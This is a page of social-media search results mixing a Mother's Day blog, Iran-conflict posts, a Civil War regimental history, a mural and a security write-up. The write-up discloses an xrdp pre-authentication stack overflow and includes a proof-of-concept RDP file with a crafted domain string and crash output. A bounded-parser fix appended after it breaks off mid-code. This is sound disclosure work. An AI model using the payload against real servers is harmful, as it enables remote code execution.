1000 results for “message_in_a_bottle”

  1. An Interesting Day

    Yesterday was quite an interesting day. It started as my normal Saturday writing the Just A Thought, Miscellaneous Minds, and Movie Reviews. Those were pretty much prepped through the week. But, I noticed my baby boy, Bobby Leach II, left a message—I kind of panicked because when that kid reaches out—it’s like the Day the Earth Stood Still—in jest, we call him the “Invisible Man” because he’s like a rarity that one very seldom sees. He left me a message that said, “Good morning Mom, just called to tell you I love you, and hope you’re having a wonderful weekend.” I called him up—we had a long conversation and he ended with…“I’ve come to the conclusion that God has it all so we just need to do what’s right, look out for each other—everybody’s not on the same level and you can’t judge where they are—just help them when and if you can and keep it moving.”

    This conversation started me on the trek of calling the rest of the crew, then I called Tanisha, my baby girl…opening with “Is the world coming to an end?” She asked why? I said, “your brother just called me—he never does that!” She said, “I know, we had a long conversation yesterday.” We discussed our plans for today and decided cooking was not part of the program.

    The next call…Joi, who I call my logistics person. She’s always exploring new restaurants and places to eat. So, I immediately asked her what were the plans for tomorrow. She was talking about something was brewing with her friend Jackie, because her mom was in town, but there was nothing carved in stone. I told her I’d like to do something with our crew — last minute would be hard to find any reservations at all if possible—but like Sherlock Holmes, she was on the case.

    I then called my oldest son, Andre’, who was on his way to the gym to workout. He’s our neighborhood health buff. When you see him, he’s a towering giant with a heart of gold. We talked for a brief moment. I told him I couldn’t wait until my new license plate came. He said, “Mom, I can’t believe how excited you are over a license plate.”

    In the interim, my Goddaughter, Christina, was calling to see what I was doing because she wanted to come by. I told her I was thinking about starting to paint the trim but hadn’t started yet. By the time she showed up, I was sitting in my easy chair with my feet up. Christina showed up at the door with the most beautiful bouquet of what looked to be like velvet flowers. She grabbed a cold bottle of water out of the fridge and we hung out watching one of my favorite Asian films…

    Somehow that painting project got placed on hold. But I had a great day. Perhaps you are thinking all she did was talk to her kids. That may be true. But the point of this post is … Communication is key…My kids’ ages range from 40 to 54. I am so thankful to God, first of all, because they are still here, secondly, they’re never too busy for momma, and God is bringing healing and restoration in places in this family’s relationship that I prayed for.

    So, on this Mother’s Day, I am so grateful for my crew. I feel like Stitch, “This is my family, it’s small and broken, but still good.” We must learn to love each other flaws and all. Happy Mother’s Day to my Mom—all my daughters, all the mothers at Peace Progressive MB, and my loyal readers. May your day be Merry and Bright! Blessings and Peace!

    © Rhema International 2026. Unauthorized use and/or duplication of this material without express and written permission from this blog’s author and/or owner is strictly prohibited. Excerpts and links may be used, provided that full and clear credit is given to Rhema Internation

    #ChristianBlogger #ChristianBlogs #MotherSDay #AnInterestingDay #Andre #Believer #Bible #Blogging #BobbyLeachII #Christ #Christian #Christianity #Christine #faith #Family #fiction #God #Jesus #Joi #Life #love #Tanisha #Writing
  2. Yesterday I learned - from the friend who took me to #Golestan Palace 15 years ago - about the importance of the Battle of #Karbala (680CE) in #Shia Islam, how it is still celebrated every year, and how #Arbaeen has been the largest gathering of humanity on the planet at ~20m.

    The key message, so deeply ingrained in that culture, is that:

    > Humiliation at the hands of a tyrant (aka total surrender) is worse than death.

    I fear Israel is manipulating the US into committing genocide in #Iran

  3. Middle East conflict is coming to a head: US preparations against Iran intensified

    According to the Financial Times, Western security circles are expecting a significantly more extensive conflict than the previous “12 Day War”. Command and control aircraft from a Joint Command Center have already arrived in Jordan. The country could become the “central US base of operations” in the event of war.

    Iran explicitly warned several neighboring states: Any support from the USA or Israel in attacks on Iranian targets would make these countries legitimate targets.

    The IRGC air force commander sent a direct message to Donald Trump: “We will answer you on the battlefield.”

    The “Houthis” are also threatening to expand the conflict: If the US attacks Iran, “American ships” would be attacked.

    #USA
    #MiddleEast #US #Iran #WarOnIran #Jordan #RGC #tRump #Yemen #Israel #RegimeChange #USpol #EpsteinWar

  4. USS Laurel Hill, May 26, 1862 (Baldwin Lithograph, Collection of President Franklin D. Roosevelt, Hyde Park, New York, 1936, U.S. Naval Heritage Command, public domain).

    Barely out of sight of the city of Alexandria, in Rapides Parish Louisiana, when it ran into the enemy during its retreat south in mid-May 1864, the Union’s Army of the Gulf easily defeated the Confederate States Army troops it encountered and continued its trek toward the village of Marksville in Avoyelles Parish. Members of the 47th Pennsylvania Volunteer Infantry, which was positioned farther back in the Union column, were aware of, but not involved in, that short engagement. According to C Company Musician Henry D. Wharton:

    After marching a few miles skirmishing commenced in front between the cavalry and the enemy in riflepits [sic] on the bank of the river, but they were easily driven away. When we came up we discovered their pits and places where there had been batteries planted. At this point the John Warren, an unarmed transport, on which were sick soldiers and women, was fired into and sunk, killing many and those that were not drowned taken prisoners. A tin-clad gunboat was destroyed at the same place, by which we lost a large mail. Many letters and directed envelopes were found on the bank – thrown there after the contents had been read by the unprincipled scoundrels. The inhumanity of Guerrilla bands in this department is beyond belief, and if one did not know the truth of it or saw some of their barbarities, he would write it down as the story of a ‘reliable gentleman’ or as told by an ‘intelligent contraband.’ Not satisfied with his murderous intent on unarmed transports he fires into the Hospital steamer Laurel Hill, with four hundred sick on board. This boat had the usual hospital signal floating fore and aft, yet, notwithstanding all this, and the customs of war, they fired on them, proving by this act that they are more hardened than the Indians on the frontier.

    * Note: The USS Laurel Hill survived the attack and, in a few short weeks, became the final home for ailing 47th Pennsylvania Volunteers, including Corporal William Schweitzer and Privates Amandus Bellis and Nicholas Hoffman (Company A) and Private John Witz (Company E).

    Map of key 1864 Red River Campaign locations, showing the battle sites of Sabine Cross Roads, Pleasant Hill and Mansura in relation to the Union’s occupation sites at Alexandria, Grand Ecore, Morganza, and New Orleans (excerpt from Dickinson College/U.S. Library of Congress map, public domain).

    Resuming their trek south with the retreating Army of the Gulf, the 47th Pennsylvania Volunteers engaged in yet another long march, trudging more than thirty miles as the month of May 1864 wore on. According to the expedition’s commanding officer, Union Major-General Nathaniel P. Banks:

    The fleet passed below Alexandria on the 13th of May. The army on its march from Alexandria did not encounter the enemy in force until near the town of Mansura. He was driven through the town in the evening of the 14th of May, and at daybreak next morning our advance encountered his cavalry on the prairie east of the town.

    According to Henry Wharton, “On Sunday, May 15, we left the river road and took a short route through the woods, saving considerable distance.”

    The windings of Red river are so numerous that it resembles the tape-worm railroad wherewith the politicians frightened the dear people during the administration of Ritner and Stevens. – We stopped several hours in the woods to leave cavalry pass, when we moved forward and by four o’clock emerged into a large open plain where we formed in line of battle, expecting a regular engagement. The enemy, however, retired and we advanced ‘till dark, when the forces halted for the night, with orders to rest on their arms. – ‘Twas here that Banks rode through our regiment, amidst the cheers of the boys, and gave the pleasant news that Grant had defeated Lee.

    “Sleeping on Their Arms” by Winslow Homer (Harper’s Weekly, May 21, 1864).

    Positioned just outside of the town of Marksville, under orders to “rest on their arms” for the night, the 47th Pennsylvanians half-dozed with their rifles within a finger’s length—but without the benefit of tents for cover. It was the eve of the Battle of Mansura, which unfolded on May 16, 1864 as follows, according to Wharton:

    Early next morning we marched through Marksville into a prairie nine miles long and six wide where every preparation was made for a fight. The whole of our force was formed in line, in support of artillery in front, who commenced operations on the enemy driving him gradually from the prairie into the woods. As the enemy retreated before the heavy fire of our artillery, the infantry advanced in line until they reached Mousoula [sic, Mansura], where they formed in column, taking the whole field in an attempt to flank the enemy, but their running qualities were so good that we were foiled. The maneuvring [sic, maneuvering] of the troops was handsomely done, and the movements was [sic, were] one of the finest things of the war. The fight of artillery was a steady one of five miles. The enemy merely stood that they might cover the retreat of their infantry and train under cover of their artillery.

    Per Major-General Banks, the Confederate troops “fell back, with steady and sharp skirmishing across the prairie, to a belt of woods, which he occupied.”

    The enemy’s position covered three roads diverging from Mansura to the Atchafalaya. He manifested a determination here to obstinately resist our passage. The engagement, which lasted several hours, was confined chiefly to the artillery until our troops got possession of the edge of the woods – first upon our left by General Emory; subsequently on our right by General Smith, when he was driven from the field, after a sharp and decisive fight, with considerable loss.

    According to military historian Steven E. Clay, “As the Army of the Gulf marched from Alexandria to Simmesport, it followed the River Road. As it moved, Taylor’s cavalry harassed the column from all sides.”

    Steele’s men resumed the pressure on A. J. Smith’s rearguard. Annoying Emory and the cavalry advanced guard was Major and Bagby’s commands. The troops also attempted to slow the Federal march by cutting trees and placing other obstacles in the way. Parson’s men skirmished with Gooding’s troopers on the right flank. None of the rebel cavalry’s efforts, however, appreciably slowed the Union column.

    On 14 May, the army’s van arrived at Bayour Choctaw. Emory called the pontoon train forward, and within a short time, the pontonniers had the stream bridged and the army was crossing…. That evening the troops of the XIX Corps [including the 47th Pennsylvania Volunteers] bivouacked beside the wrecks of the John Warner, Signal, and Covington. Strewn upon the ground were the letters many of the men had mailed to their loved ones earlier and had been placed on the Warner bound for New Orleans. The rebel soldiers had opened the letters, read them for entertainment, and simply tossed them aside. The idea did not sit well with the Federals, but neither did the wanton destruction and plunder of civilian homes with the Confederates.

    On 15 May the column slowly crossed the Bayou Choctaw Swamp and entered the Avoyelles … Prairie. There, Major’s cavalry, later along with Bagby’s troops, attacked the lead elements several times. The fighting became so hot at moments that Emory deployed his artillery to help drive the bothersome rebel troopers away…. By nightfall … the XIX Corps had reached Marksville with the rest of the army strung out behind.

    Late on 15 May, Banks learned that Taylor had massed his forces six miles ahead at the town of Mansura, evidently with the intention of blocking further Federal movement on the road to Simmesport…. On learning of the concentration of rebel forces, Banks sent orders to Emory directing him to move no later than 0300 [3 a.m.] on 16 May and to attack the enemy at daybreak. Further, Smith advanced on Emory’s right to attack into Taylor’s left flank. The XIII Corps [13th Corps], now under Lawler since 9 May … was to remain in front of Marksville as the reserve. The trains [Union wagon trains] were held behind that town….

    As ordered, the Army of the Gulf moved south before sunrise. As morning dawned, the Federal army began its deployment on the wide open plain of the Avoyelles Prairie. The US troops advanced with Emory’s XIX [including the 47th Pennsylvania] in the lead with Grover’s 1st Division on the Federal left near the Grand River and McMillan’s 2nd Division [including the 47th Pennsylvania] on the right. The XIX Corps was followed by A. J. Smith’s XVI Corps [16th Corps] in column; Mower’s division was followed by that of Kilby Smith. As the Federal brigades deployed on the field they could see the Confederate battle line in the distance. Virtually in the center of the battlefield was the tiny village of Mansura.

    According to Clay, Confederate Major-General Richard Taylor (a plantation owner and son of former U.S. President Zachary Taylor) “had placed eight dismounted cavalry regiments from Major’s and Bagby’s commands to the east of the hamlet” of Mansura. “At least 19 cannon with the batteries interspersed among the brigades supported these troops.” Confederate Brigadier-General Camille Armand Jules Marie, the Prince de Polignac, a prince of France who fought with the Confederate Army during America’s Civil War and whom the 47th Pennsylvanian Volunteers had previously faced in combat during the Battle of Sabine Cross Roads near Mansfield, Louisiana, “posted his two small infantry brigades and two dismounted regiments of cavalry on the left, west of town, and thirteen more guns supported Polignac’s force.”

    New York Tribune headline announcing the U.S. Army of the Gulf’s May 1864 victory near Marksville, Louisiana (New York Tribune, June 3, 1864, public domain).

    Standing “on a flat, green savanna,” according to Clay, the troops under Brigadier-General Emory’s command, including the 47th Pennsylvania Volunteers, were the first to march into the battle’s fray, followed by A. J. Smith’s “divisions to the right of the line.” It quickly became obvious to all who were watching the scene unfold that Taylor had woefully misjudged his opponents; his six thousand Confederates were greeted with the spectacle of the eighteen-thousand strong Army of the Gulf arrayed before them.

    According to Clay, “The battle began sometime after 0600 [6 a.m.] with a mutual artillery bombardment.”

    As the fusillade opened, commanders on both sides ordered their men to lie down in order to reduce casualties during the artillery duel. The tactic was effective. The barrage lasted about four hours, but few men were struck by the many rounds fired. As the Union battle line rose and moved forward on occasion, Taylor’s skirmish line responded by slowly giving ground…. Finally, at about 1000 (1 p.m.), as the XVI Corps pressed forward on the Confederate left to flank Taylor’s position as planned, the rebel line quickly sidestepped the move and fell back toward their trains which were located southwest in the village of Evergreen.

    Unlike the sanguinary opening battles of the Red River Campaign, the Battle of Mansura was far less brutal. Per Wharton:

    Our loss was slight. Of the rebels we could not ascertain correctly, but learned from citizens who had secreted themselves during the fight, that they had many killed and wounded, who threw them into wagons, promiscuously, and drove them off so that we could not learn their casualties.

    Afterward, the victorious Army of the Gulf resumed its march south. According to Major-General Banks:

    The 16th of May we reached Simmsport [sic, Simmesport], on the Atchafalaya. Being entirely destitute of any ordinary bridge material for the passage of this river – about six hundred yards wide – a bridge was constructed of the steamers, under direction of Lieutenant Colonel Bailey. This work was not of the same magnitude, but was as important to the army as the dam at Alexandria was to the navy. It had the merit of being an entirely novel construction, no bridge of such magnitude having been constructed of similar materials. The bridge was completed at one o’clock on the 19th of May. The wagon train passed in the afternoon, and the troops the next morning, in better spirit and condition, as able and eager to meet the enemy as at any period of the campaign.

    Union Major-General Nathaniel Banks subsequently reported that, during the Army of the Gulf’s final engagement with Confederates, the “command of General A. J. Smith, which covered the rear of the army during the construction of the bridge and the passage of the army, had a severe engagement with the enemy, under Polignac, on the afternoon of the 19th, at Yellow Bayou, which lasted several hours.”

    Our loss was about one hundred and fifty in killed and wounded; that of the enemy much greater, besides many prisoners who were taken by our troops. Major General E. R. S. Canby arrived at Simmsport [sic, Simmesport] on the 19th of May, and the next day assumed command of the troops as a portion of the forces of the military division of the West Mississippi, to the command of which he had been assigned.

    The 47th Pennsylvania, however, was not involved in that battle at Yellow Bayou; according to Wharton:

    This fight was the last one of the expedition. The whole of the force is safe on the Mississippi, gunboats, transports and trains. The 16th and 17th have gone to their old commands.

    It is amusing to read the statements of correspondents to papers North, concerning our movements and the losses of our army. I have it from the best source that the Federal loss from Franklin to Mansfield, and from their [sic] to this point does not exceed thirty-five hundred in killed, wounded and missing, while that of the rebels is over eight thousand.

    Union Army base at Morganza Bend, Louisiana, circa 1863-1865 (U.S. Library of Congress, public domain).

    After that final battle, the surviving members of the 47th made their way through Simmesport and into the Atchafalaya Basin, and then moved on to the village of Morganza, where they made camp again. According to Wharton, the members of Company C were sent on a special mission which took them on an intense journey of one hundred and twenty miles:

    Company C, on last Saturday was detailed by the General in command of the Division to take one hundred and eighty-seven prisoners (rebs) to New Orleans. This they done [sic] satisfactorily and returned yesterday to their regiment, ready for duty. While in the City some of the boys made Captain Gobin quite a handsome present, to show their appreciation of him as an officer gentleman.

    By May 28, 1864, the men from Company C had returned from New Orleans and were once again encamped at Morganza with the full 47th Pennsylvania Volunteer Infantry, prompting Henry Wharton to write:

    The boys are well. James Kennedy who was wounded at Pleasant Hill, died at New Orleans hospital a few days ago. His friends in the company were pleased to learn that Dr. Dodge of Sunbury, now of the U.S. Steamer Octorora, was with him in his last moments, and ministered to his wants. The Doctor was one of the Surgeons from the Navy who volunteered when our wounded was [sic, were] sent to New Orleans.

    Their long trek through Louisiana was over, but their fight to preserve America’s Union was not.

    Sources:

    1. Banks, Nathaniel P. “Report of the Red River Campaign,” in “Annual Report of the Secretary of War,” in Message of the President of the United States, and Accompanying Documents, to the Two Houses of Congress, at the Commencement of the First Session of the Thirty-Ninth Congress. Washington: Government Printing Office, 1866.
    2. Bates, Samuel P. History of Pennsylvania Volunteers, 1861-5, vol. 1. Harrisburg, Pennsylvania: B. Singerly, State Printer, 1869.
    3. “Battle of Pleasant Hill, April 9, 1864, Walker’s Texas Division Campaign Map, Detail,” in “House Divided.” Carlisle, Pennsylvania: History Department, Dickinson College, November 21, 2009 (cropped from the original public domain map available on the website of the U.S. Library of Congress).
    4. Clay, Steven E. The Staff Ride Handbook for the Red River Campaign, 7 March-19 May 1864. Fort Leavenworth, Kansas: Combat Studies Institute Press, U.S. Army Combined Arms Centers, 2023.
    5. Prisoner of War Records, Camp Ford and Camp Groce (47th Pennsylvania Volunteer Infantry). Tyler Texas: Smith County Historical Society, 2010.
    6. Report of Maj. Gen. Nathaniel P. Banks, U. S. Army, Commanding Expedition and Department of the Gulf (to Edwin M. Stanton, Secretary of War), in Annual Report of the Secretary of War, in Message of the President of the United States, and Accompanying Documents, to the Two Houses of Congress, at the Commencement of the First Session of the Thirty-Ninth Congress. Washington, D.C.: Government Printing Office, 1866.
    7. Schmidt, Lewis G. A Civil War History of the 47th Regiment of Pennsylvania Veteran Volunteers. Allentown, Pennsylvania: Self-published, 1986.
    8. “The History of the Forty-Seventh Regt. P. V.” Allentown, Pennsylvania: The Lehigh Register, July 20, 1870.
    9. Wharton, Henry D. Letters from the Sunbury Guards, 1861-1868. Sunbury, Pennsylvania: Sunbury American.

     

    https://47thpennsylvaniavolunteers.com/2024/05/16/the-march-from-marksville-to-morganza-louisiana-and-the-battle-of-mansura-mid-to-late-may-1864/

    #003366 #1864 #47thPennsylvaniaInfantry #47thPennsylvaniaVolunteers #Alexandria #America #AmericanCivilWar #AmericanHistory #Army #ArmyOfTheGulf #Atchafalaya #AvoyellesParish #BattleOfMansura #CivilWar #CommonwealthOfPennsylvania #Emory #History #Infantry #LaurelHill #Louisiana #Mansura #Marksville #Morganza #NathanielPBanks #PennsylvaniaHistory #PennsylvaniaInTheCivilWar #RapidesParish #RedRiver #RedRiverCampaign #Simmesport #Slavery #TheUnionArmy #USMilitaryAndTheUnionArmy #USSLaurelHill #WilliamHEmory #XIXCorps

  5. Message in a bottle – Mural by WD (Wild Drawing) in Morlaix, France for MX ARTS TOUR

    Street artist WD (Wild Drawing) By WD (Wild Drawing) in Morlaix, France for MX ARTS TOUR. Wild Drawing: Message in a bottle, Morlaix France 2022. Today, more and more people are trapped and alone in their bottled world… no one listens to their desperate efforts for communication, help and humanity. My latest mural for MX ARTS TOUR festival 2022, big thanks to ZAG and the whole team, you guys rock.

    streetartutopia.com/2024/03/03

  6. CVE-2025-68670: discovering an RCE vulnerability in xrdp

    In addition to KasperskyOS-powered solutions, Kaspersky offers various utility software to streamline business operations. For instance, users of Kaspersky Thin Client, an operating system for thin clients, can also purchase Kaspersky USB Redirector, a module that expands the capabilities of the xrdp remote desktop server for Linux. This module enables access to local USB devices, such as flash drives, tokens, smart cards, and printers, within a remote desktop session – all while maintaining connection security.

    We take the security of our products seriously and regularly conduct security assessments. Kaspersky USB Redirector is no exception. Last year, during a security audit of this tool, we discovered a remote code execution vulnerability in the xrdp server, which was assigned the identifier CVE-2025-68670. We reported our findings to the project maintainers, who responded quickly: they fixed the vulnerability in version 0.10.5, backported the patch to versions 0.9.27 and 0.10.4.1, and issued a security bulletin. This post breaks down the details of CVE-2025-68670 and provides recommendations for staying protected.

    Client data transmission via RDP


    Establishing an RDP connection is a complex, multi-stage process where the client and server exchange various settings. In the context of the vulnerability we discovered, we are specifically interested in the Secure Settings Exchange, which occurs immediately before client authentication. At this stage, the client sends protected credentials to the server within a Client Info PDU (protocol data unit with client info): username, password, auto-reconnect cookies, and so on. These data points are bundled into a TS_INFO_PACKET structure and can be represented as Unicode strings up to 512 bytes long, the last of which must be a null terminator. In the xrdp code, this corresponds to the xrdp_client_info structure, which looks as follows:

        struct xrdp_client_info
        {
            [..SNIP..]
            char username[INFO_CLIENT_MAX_CB_LEN];
            char password[INFO_CLIENT_MAX_CB_LEN];
            char domain[INFO_CLIENT_MAX_CB_LEN];
            char program[INFO_CLIENT_MAX_CB_LEN];
            char directory[INFO_CLIENT_MAX_CB_LEN];
            [..SNIP..]
        };

    The value of the INFO_CLIENT_MAX_CB_LEN constant corresponds to the maximum string length and is defined as follows:

        #define INFO_CLIENT_MAX_CB_LEN 512

    When transmitting Unicode data, the client uses the UTF-16 encoding. However, the server converts the data to UTF-8 before saving it.

        if (ts_info_utf16_in( // [1]
                s, len_domain, self->rdp_layer->client_info.domain,
                sizeof(self->rdp_layer->client_info.domain)) != 0) // [2]
        {
            [..SNIP..]
        }

    The size of the buffer for unpacking the domain name in UTF-8 [2] is passed to the ts_info_utf16_in function [1], which implements buffer overflow protection [3].

        static int ts_info_utf16_in(struct stream *s, int src_bytes, char *dst, int dst_len)
        {
            int rv = 0;
            LOG_DEVEL(LOG_LEVEL_TRACE, "ts_info_utf16_in: uni_len %d, dst_len %d", src_bytes, dst_len);
            if (!s_check_rem_and_log(s, src_bytes + 2, "ts_info_utf16_in"))
            {
                rv = 1;
            }
            else
            {
                int term;
                int num_chars = in_utf16_le_fixed_as_utf8(s, src_bytes / 2,
                                                          dst, dst_len);
                if (num_chars > dst_len) // [3]
                {
                    LOG(LOG_LEVEL_ERROR, "ts_info_utf16_in: output buffer overflow");
                    rv = 1;
                }
                // String should be null-terminated. We haven't read the terminator yet
                in_uint16_le(s, term);
                if (term != 0)
                {
                    LOG(LOG_LEVEL_ERROR, "ts_info_utf16_in: bad terminator. Expected 0, got %d", term);
                    rv = 1;
                }
            }
            return rv;
        }

    Next, the in_utf16_le_fixed_as_utf8_proc function, where the actual data conversion from UTF-16 to UTF-8 takes place, checks the number of bytes written [4] as well as whether the string is null-terminated [5].

        /* Body of in_utf16_le_fixed_as_utf8_proc */
        {
            unsigned int rv = 0;
            char32_t c32;
            char u8str[MAXLEN_UTF8_CHAR];
            unsigned int u8len;
            char *saved_s_end = s->end;

            // Expansion of S_CHECK_REM(s, n*2) using passed-in file and line
        #ifdef USE_DEVEL_STREAMCHECK
            parser_stream_overflow_check(s, n * 2, 0, file, line);
        #endif
            // Temporarily set the stream end pointer to allow us to use
            // s_check_rem() when reading in UTF-16 words
            if (s->end - s->p > (int)(n * 2))
            {
                s->end = s->p + (int)(n * 2);
            }

            while (s_check_rem(s, 2))
            {
                c32 = get_c32_from_stream(s);
                u8len = utf_char32_to_utf8(c32, u8str);
                if (u8len + 1 <= vn) // [4]
                {
                    /* Room for this character and a terminator. Add the character */
                    unsigned int i;
                    for (i = 0 ; i < u8len ; ++i)
                    {
                        v[i] = u8str[i];
                    }

                    vn -= u8len;
                    v += u8len;
                }
                else if (vn > 1)
                {
                    /* We've skipped a character, but there's more than one byte
                     * remaining in the output buffer. Mark the output buffer as
                     * full so we don't get a smaller character being squeezed into
                     * the remaining space */
                    vn = 1;
                }

                rv += u8len;
            }
            // Restore stream to full length
            s->end = saved_s_end;
            if (vn > 0)
            {
                *v = '\0'; // [5]
            }
            ++rv;
            return rv;
        }

    Consequently, up to 512 bytes of input data in UTF-16 are converted into UTF-8 data, which can also reach a size of up to 512 bytes.

    CVE-2025-68670: an RCE vulnerability in xrdp


    The vulnerability exists within the xrdp_wm_parse_domain_information function, which processes the domain name saved on the server in UTF-8. Like the functions described above, this one is called before client authentication, meaning exploitation does not require valid credentials. The call stack below illustrates this.

        xrdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax,
                                         int decode, char *resultBuffer)
        xrdp_login_wnd_create(struct xrdp_wm *self)
        xrdp_wm_init(struct xrdp_wm *self)
        xrdp_wm_login_state_changed(struct xrdp_wm *self)
        xrdp_wm_check_wait_objs(struct xrdp_wm *self)
        xrdp_process_main_loop(struct xrdp_process *self)

    The code snippet where the vulnerable function is called looks like this:

        char resultIP[256]; // [7]
        [..SNIP..]
        combo->item_index = xrdp_wm_parse_domain_information(
                                self->session->client_info->domain, // [6]
                                combo->data_list->count, 1,
                                resultIP /* just a dummy place holder, we ignore
                                          */ );

    As you can see, the first argument of the function in line [6] is the domain name up to 512 bytes long. The final argument is the resultIP buffer of 256 bytes (as seen in line [7]). Now, let’s look at exactly what the vulnerable function does with these arguments.

        static int
        xrdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax,
                                         int decode, char *resultBuffer)
        {
            int ret;
            int pos;
            int comboxindex;
            char index[2];

            /* If the first char in the domain name is '_' we use the domain name as IP*/
            ret = 0; /* default return value */
            /* resultBuffer assumed to be 256 chars */
            g_memset(resultBuffer, 0, 256);
            if (originalDomainInfo[0] == '_') // [8]
            {
                /* we try to locate a number indicating what combobox index the user
                 * prefer the information is loaded from domain field, from the client
                 * We must use valid chars in the domain name.
                 * Underscore is a valid name in the domain.
                 * Invalid chars are ignored in microsoft client therefore we use '_'
                 * again. this sec '__' contains the split for index.*/
                pos = g_pos(&originalDomainInfo[1], "__"); // [9]
                if (pos > 0)
                {
                    /* an index is found we try to use it */
                    LOG(LOG_LEVEL_DEBUG, "domain contains index char __");
                    if (decode)
                    {
                        [..SNIP..]
                    }
                    /* pos limit the String to only contain the IP */
                    g_strncpy(resultBuffer, &originalDomainInfo[1], pos); // [10]
                }
                else
                {
                    LOG(LOG_LEVEL_DEBUG, "domain does not contain _");
                    g_strncpy(resultBuffer, &originalDomainInfo[1], 255);
                }
            }
            return ret;
        }

    As seen in the code, if the first character of the domain name is an underscore (line [8]), a portion of the domain name – starting from the second character and ending with the double underscore (“__”) – is written into the resultIP buffer (line [9]). Since the domain name can be up to 512 bytes long, it may not fit into the buffer even if it’s technically well-formed (line [10]). Consequently, the overflow data will be written to the thread stack, potentially modifying the return address. If an attacker crafts a domain name that overflows the stack buffer and replaces the return address with a value they control, execution flow will shift according to the attacker’s intent upon returning from the vulnerable function, allowing for arbitrary code execution within the context of the compromised process (in this case, the xrdp server).

    To exploit this vulnerability, the attacker simply needs to specify a domain name that, after being converted to UTF-8, contains more than 256 bytes between the initial “_” and the subsequent “__”. Given that the conversion follows specific rules easily found online, this is a straightforward task: one can simply take advantage of the fact that the length of the same string can vary between UTF-16 and UTF-8. In short, this involves avoiding ASCII and certain other characters that may take up more space in UTF-16 than in UTF-8, while also being careful not to abuse characters that expand significantly after conversion. If the resulting UTF-8 domain name exceeds the 512-byte limit, a conversion error will occur.

    PoC


    As a PoC for the discovered vulnerability, we created the following RDP file containing the RDP server’s IP address and a long domain name designed to trigger a buffer overflow. In the domain name, we used a specific number of K (U+041A) characters to overwrite the return address with the string “AAAAAAAA”. The contents of the RDP file are shown below:
    alternate full address:s:172.22.118.7
    full address:s:172.22.118.7
    domain:s:_veryveryveryverKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKeryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveaaaaaaaaryveryveryveryveryveryveryveryveryveryveryveryverylongdoAAAAAAAA__0
    username:s:testuser
    When you open this file, the mstsc.exe process connects to the specified server. The server processes the data in the file and attempts to write the domain name into the buffer, which results in a buffer overflow and the overwriting of the return address. If you look at the xrdp memory dump at the time of the crash, you can see that both the buffer and the return address have been overwritten. The application terminates during the stack canary check. The example below was captured using the gdb debugger.
    gef➤ bt
    #0 __pthread_kill_implementation (no_tid=0x0, signo=0x6, threadid=0x7adb2dc71740) at ./nptl/pthread_kill.c:44
    #1 __pthread_kill_internal (signo=0x6, threadid=0x7adb2dc71740) at ./nptl/pthread_kill.c:78
    #2 __GI___pthread_kill (threadid=0x7adb2dc71740, signo=signo@entry=0x6) at ./nptl/pthread_kill.c:89
    #3 0x00007adb2da42476 in __GI_raise (sig=sig@entry=0x6) at ../sysdeps/posix/raise.c:26
    #4 0x00007adb2da287f3 in __GI_abort () at ./stdlib/abort.c:79
    #5 0x00007adb2da89677 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7adb2dbdb92e "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:156
    #6 0x00007adb2db3660a in __GI___fortify_fail (msg=msg@entry=0x7adb2dbdb916 "stack smashing detected") at ./debug/fortify_fail.c:26
    #7 0x00007adb2db365d6 in __stack_chk_fail () at ./debug/stack_chk_fail.c:24
    #8 0x000063654a2e5ad5 in ?? ()
    #9 0x4141414141414141 in ?? ()
    #10 0x00007adb00000a00 in ?? ()
    #11 0x0000000000050004 in ?? ()
    #12 0x00007fff91732220 in ?? ()
    #13 0x000000000000030a in ?? ()
    #14 0xfffffffffffffff8 in ?? ()
    #15 0x000000052dc71740 in ?? ()
    #16 0x3030305f70647278 in ?? ()
    #17 0x616d5f6130333030 in ?? ()
    #18 0x00636e79735f6e69 in ?? ()
    #19 0x0000000000000000 in ?? ()

    Protection against vulnerability exploitation


    It is worth noting that the vulnerable function can be protected by a stack canary via compiler settings. In most compilers, this option is enabled by default, which prevents an attacker from simply overwriting the return address and executing a ROP chain. To successfully exploit the vulnerability, the attacker would first need to obtain the canary value.

    The vulnerable function is also referenced by the xrdp_wm_show_edits function; however, even in that case, if the code is compiled with secure settings (using stack canaries), the most trivial exploitation scenario remains unfeasible.

    Nevertheless, a stack canary is not a panacea. An attacker could potentially leak or guess its value, allowing them to overwrite the buffer and the return address while leaving the canary itself unchanged. In the security bulletin dedicated to CVE-2025-68670, the xrdp maintainers advise against relying solely on stack canaries when using the project.

    Vulnerability remediation timeline


    • 12/05/2025: we submitted the vulnerability report via github.com/neutrinolabs/xrdp/s…
    • 12/05/2025: the project maintainers immediately confirmed receipt of the report and stated they would review it shortly.
    • 12/15/2025: investigation and prioritization of the vulnerability began.
    • 12/18/2025: the maintainers confirmed the vulnerability and began developing a patch.
    • 12/24/2025: the vulnerability was assigned the identifier CVE-2025-68670.
    • 01/27/2026: the patch was merged into the project’s main branch.


    Conclusion


    Taking a responsible approach to code not only makes our own products more solid but also enhances popular open-source projects. We have previously shared how security assessments of KasperskyOS-based solutions – such as Kaspersky Thin Client and Kaspersky IoT Secure Gateway – led to the discovery of several vulnerabilities in Suricata and FreeRDP, which project maintainers quickly patched. CVE-2025-68670 is yet another one of those stories.

    However, discovering a vulnerability is only half the battle. We would like to thank the xrdp maintainers for their rapid response to our report, for fixing the vulnerability, and for issuing a security bulletin detailing the issue and risk mitigation options.

    securelist.com/cve-2025-68670/…
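
    The g_strncpy call marked [10] above copies pos bytes into a 256-byte buffer without comparing the two sizes. The block below is an added example, not xrdp's code and not the upstream patch: a parser that takes the destination size as a parameter and rejects an oversized host part instead of copying it. The names parse_host_bounded, legacy_store_size, check_case and the status codes are hypothetical, the test domain is constructed, and the g_strncpy behaviour noted in the comments is an assumption.

```c
#include <stdio.h>
#include <string.h>

#define DOMAIN_MAX 512u /* INFO_CLIENT_MAX_CB_LEN on the page */
#define RESULT_MAX 256u /* sizeof(resultIP) on the page */
#define GUARD_DAMAGED (-2)

enum parse_status { PARSE_TOO_LONG = -1, PARSE_NO_HOST = 0, PARSE_OK = 1 };

/* Length of the host part: the bytes after the leading '_' up to the first
 * "__", or to the end of the string when there is no separator. */
static size_t host_part_len(const char *domain)
{
    const char *host = domain + 1;
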